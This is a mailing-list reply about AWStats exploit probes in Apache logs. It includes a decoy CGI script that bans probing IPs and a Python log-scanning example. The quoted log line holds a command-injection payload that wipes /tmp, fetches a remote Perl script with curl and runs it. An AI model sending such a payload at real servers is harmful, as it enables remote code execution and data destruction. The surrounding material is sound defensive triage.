Security Basics mailing list archives
Re: GET //awstats.pl? in apache logs
From: "S.A. Birl" <sbirl () temple edu>
Date: Mon, 24 Oct 2005 10:23:39 -0400 (EDT)
On Oct 21, Konstantine (nospam-listclient () gmail com ns) typed:

Konstantine:  My apache logs show rows after rows of following, all from
Konstantine:  various IP addresses. This started a couple of days ago. I
Konstantine:  don't have awstats. Could somebody tell me what is that? Is
Konstantine:  there anything I should be doing? thanks.K.
Konstantine:
Konstantine:  GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1

awstats.pl, I believe, is the AccessWatch log statistics program used to
provide stat details for webservers.

However, that particular entry was trying to find an exploit, but since you
don't have it, the web server should have returned a 404. No harm.

You can ignore those, unless you see the server suddenly return a 200
instead of the 404.

Or, you could do what I did:
Write your own Perl script to capture the offending IP, write it out to an
external blacklist (that Apache includes in its httpd.conf); restart Apache
and voilà! IP banned.

==================================================================
#!/usr/bin/perl -T -w
# Decoy awstats.pl: any client that requests it gets its address banned.
use warnings;
use strict;

my $IP;

# Taint mode (-T) needs a known-safe PATH before system() is called.
$ENV{PATH}="/usr/bin";

printf("Content-Type: text/html\n\n");

# Address of the requesting client, as set by Apache for the CGI.
$IP=$ENV{"REMOTE_ADDR"};

# Append a Deny rule to the blacklist file that httpd.conf includes.
open(OUTPUT, ">>/usr/local/apache/nobody/banned") or die;
printf(OUTPUT "\t# %s\n", $0);
printf(OUTPUT "\tDeny from %s\n", $IP);
close(OUTPUT);

# Touch the restart marker so Apache gets restarted and picks up the new rule.
system("/usr/bin/touch /usr/local/apache/nobody/restart");
==================================================================

If you view this URL, your IP is blacklisted within 2 seconds:
http://concept.temple.edu/cgi-bin/awstats.pl

Comments/Criticism required. :)

Thanks

Scott Birl                     http://concept.temple.edu/sysadmin/
Senior Systems Administrator
Computer Services
Temple University
====*====*====*====*====*====*====*====+====*====*====*====*====*====*====*====*
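The triage the reply describes (ignore the 404s, look closely at anything else), as an added example that is not part of the original message: a Python scan over Apache access-log lines for awstats.pl requests carrying a pipe in `configdir`. The log lines are constructed, and the function names and the choice to flag every non-404 status (not only 200) are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Oct/2005:03:14:07 -0400] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;echo| HTTP/1.1" 404 287
198.51.100.7 - - [21/Oct/2005:03:15:12 -0400] "GET /cgi-bin/awstats.pl?configdir=%7Cecho%20;cd%20/tmp;echo%7C HTTP/1.1" 200 1532
203.0.113.5 - - [21/Oct/2005:03:16:40 -0400] "GET /index.html HTTP/1.1" 200 5120
192.0.2.10 - - [21/Oct/2005:03:17:01 -0400] "GET /awstats/awstats.pl?config=example.org HTTP/1.1" 404 287
"""

def find_probes(log_text):
    """Return (ip, status, target) for awstats.pl requests whose configdir
    parameter contains a pipe, as in the request quoted in the message."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        path, _, query = m.group("target").partition("?")
        if not path.lower().endswith("/awstats.pl"):
            continue
        for param in query.split("&"):
            name, _, value = param.partition("=")
            # Decode after splitting so %7C is caught as well as a literal |
            if unquote(name).lower() == "configdir" and "|" in unquote(value):
                hits.append((m.group("ip"), int(m.group("status")), m.group("target")))
                break
    return hits

def needs_investigation(hits):
    """Probes the server did not answer with 404 (assumption: any other status is worth a look)."""
    return [h for h in hits if h[1] != 404]

if __name__ == "__main__":
    for ip, status, target in find_probes(SAMPLE_LOG):
        flag = "ignore (404)" if status == 404 else "INVESTIGATE"
        print(f"{ip:15} {status} {flag}: {target}")
```
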